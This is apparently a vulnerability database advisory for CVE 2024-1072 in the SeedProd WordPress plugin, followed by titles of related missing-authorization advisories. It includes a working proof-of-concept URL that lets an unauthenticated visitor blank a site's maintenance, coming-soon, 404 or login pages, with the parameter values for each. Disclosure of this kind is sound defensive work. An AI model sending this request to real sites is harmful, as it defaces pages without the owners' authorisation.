Website Builder by SeedProd < 6.15.22 – Unauthenticated Plugin Page Content Update | CVE 2024-1072 | Plugin Vulnerabilities

Description

The plugin does not have authorisation in its seedprod_lite_new_lpage function, allowing unauthenticated attackers to update the contents of coming-soon, maintenance pages, login and 404 pages set up with the plugin to a blank state

Proof of Concept

As unauthenticated, open the following URL to put the Maintenance Mode page as blank: https://example.com/wp-admin/admin-post.php?page=seedprod_lite_template&id=0&type=mm

To update other page, change the type parameter accordingly:
- cs for Coming Soon
- mm for Maintenance Mode
- p404 for 404
- loginp for Login Page

Affects Plugins

Fixed in 6.15.22

References

CVE

URL

https://www.wordfence.com/threat-intel/vulnerabilities/id/78d7920b-3e20-43c7-a522-72bac824c2cb

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Lucio Sá

Verified

Yes

WPVDB ID

19eb822d-84f3-48f2-ba1a-dbeaac64fb44

Timeline

Publicly Published

2024-01-31 (about 2 years ago)

Added

2024-02-01 (about 2 years ago)

Last Updated

2024-02-01 (about 2 years ago)

Other

Published

Title

Published

2026-01-09

Title

miniOrange OTP Verification and SMS Notification for WooCommerce < 4.3.9 - Missing Authorization to Unauthenticated Notification Settings Modification

Published

2023-11-27

Title

Participants Database < 2.5.6 - Missing Authorization

Published

2025-04-01

Title

ShipDepot for WooCommerce <= 1.2.19 - Missing Authorization

Published

2024-04-25

Title

XStore < 9.3.9 - Missing Authorization

Published

2025-06-05

Title

Wordapp <= 1.7.0 - Missing Authorization